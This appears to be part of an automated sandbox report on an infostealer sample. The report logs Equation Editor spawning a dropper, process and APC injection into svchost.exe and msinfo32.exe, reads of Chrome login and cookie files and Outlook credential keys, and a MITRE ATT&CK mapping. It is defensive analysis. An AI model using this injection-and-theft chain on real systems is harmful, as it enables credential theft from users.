Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtSetInformationThread: Direct from: 0x774CFF12Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe protection: execute and read and writeJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeSection loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\msinfo32.exeThread APC queued: target process: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeJump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\word.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0043916A LogonUserW,5_2_0043916A
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D6D0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_004375B0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,5_2_00436431
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00445DD3
Source: uAjPOONiWk.exe, 00000007.00000000.481571315.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639715330.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510459077.0000000000900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: word.exe, uAjPOONiWk.exe, 00000007.00000000.481571315.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639715330.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510459077.0000000000900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: word.exe, 00000005.00000000.426651290.0000000000482000.00000002.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp, word.exe.2.dr, kontempt2.1[1].exe.2.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: uAjPOONiWk.exe, 00000007.00000000.481571315.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639715330.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510459077.0000000000900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00410D10 cpuid 5_2_00410D10
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\02ld_.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\02ld_.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\02ld_.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\02ld_.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\02ld_.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\02ld_.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\02ld_.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\02ld_.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_004223BC
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004711D2 GetUserNameW,5_2_004711D2
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,5_2_0042039F
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_0040E470
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
Source: kontempt2.1[1].exe.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: word.exeBinary or memory string: WIN_XP
Source: word.exeBinary or memory string: WIN_XPe
Source: word.exeBinary or memory string: WIN_VISTA
Source: word.exeBinary or memory string: WIN_7
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_004741BB
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,5_2_0046483C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0047AD92
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E0B34D sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,8_2_61E0B34D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D5B6 sqlite3_bind_double,sqlite3_mutex_leave,8_2_61E2D5B6
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E9553A sqlite3_step,sqlite3_bind_int,sqlite3_malloc,memcmp,sqlite3_finalize,sqlite3_free,sqlite3_prepare_v2,sqlite3_free,sqlite3_free,sqlite3_step,sqlite3_reset,sqlite3_reset,sqlite3_stricmp,sqlite3_malloc,sqlite3_step,sqlite3_reset,8_2_61E9553A
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E037E6 sqlite3_bind_parameter_name,8_2_61E037E6
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E037D4 sqlite3_bind_parameter_count,8_2_61E037D4
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D76E sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E2D76E
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D72A sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E2D72A
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1572D sqlite3_bind_parameter_index,8_2_61E1572D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E036FA sqlite3_value_frombind,8_2_61E036FA
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D6AD sqlite3_bind_pointer,sqlite3_mutex_leave,8_2_61E2D6AD
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D67C sqlite3_bind_null,sqlite3_mutex_leave,8_2_61E2D67C
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D656 sqlite3_bind_int,sqlite3_bind_int64,8_2_61E2D656
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D607 sqlite3_bind_int64,sqlite3_mutex_leave,8_2_61E2D607
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D99D sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,8_2_61E2D99D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D96E sqlite3_bind_text16,8_2_61E2D96E
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D932 sqlite3_bind_text64,8_2_61E2D932
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D903 sqlite3_bind_text,8_2_61E2D903
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D8D4 sqlite3_bind_blob64,8_2_61E2D8D4
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D8A5 sqlite3_bind_blob,8_2_61E2D8A5
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E95B00 sqlite3_exec,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_exec,8_2_61E95B00
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2DA9D sqlite3_bind_value,8_2_61E2DA9D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E12EEA sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,8_2_61E12EEA

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		3
Native API		1
Scripting		1
Exploitation for Privilege Escalation		1
Disable or Modify Tools		1
OS Credential Dumping		2
System Time Discovery		Remote Services1
Archive Collected Data		6
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts33
Exploitation for Client Execution		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Deobfuscate/Decode Files or Information		21
Input Capture		1
Account Discovery		Remote Desktop Protocol1
Browser Session Hijacking		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt2
Valid Accounts		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares1
Data from Local System		5
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
Valid Accounts		2
Obfuscated Files or Information		NTDS128
System Information Discovery		Distributed Component Object Model1
Email Collection		6
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
Access Token Manipulation		1
Install Root Certificate		LSA Secrets24
Security Software Discovery		SSH21
Input Capture		Fallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
Process Injection		1
DLL Side-Loading		Cached Domain Credentials2
Virtualization/Sandbox Evasion		VNC3
Clipboard Data		Multiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Masquerading		DCSync3
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Valid Accounts		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Modify Registry		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
Virtualization/Sandbox Evasion		Network Sniffing1
